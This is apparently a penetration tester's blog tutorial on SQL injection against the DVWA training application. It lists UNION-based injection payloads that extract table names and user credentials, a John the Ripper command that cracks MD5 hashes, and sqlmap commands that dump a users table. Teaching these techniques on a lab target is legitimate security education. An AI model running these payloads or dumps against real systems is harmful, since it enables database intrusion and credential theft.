SQL Injection Tutorial Bumper Pack

  • 1.3K
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    1.3K
    Shares

Here is a video showing you how to perform and SQL injection the vulnerable application is called DVWA and can be downloaded from the following address: http://www.dvwa.co.uk/

Here are the commands used in the above video

1' or '1'='1'#
1' or 1=1 union select database(), user() #
1' and 1=1 union select null, table_name from information_schema.tables #
1' and 1=1 union select null, table_name from information_schema.tables where table_name like 'user%'#
1' and 1=1 union select user, password from users #

Here I show you how to crack a number the password hashes that were acquired from the database using John the Ripper (JTR), John is a great brute force and dictionary attack tool that should be the first port of call when password cracking.
 

Here are the commands used in the above video

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwords

Here is a video showing you how to perform and Blind SQL injection. The tool used was called SQLmap which is capable of cracking the password hashes after they have been extracted from the database.


Here are the commands used in the above video

sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" 
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" --dbs
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -D dvwa --tables
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -T users --column
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -C user,password --dump
The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]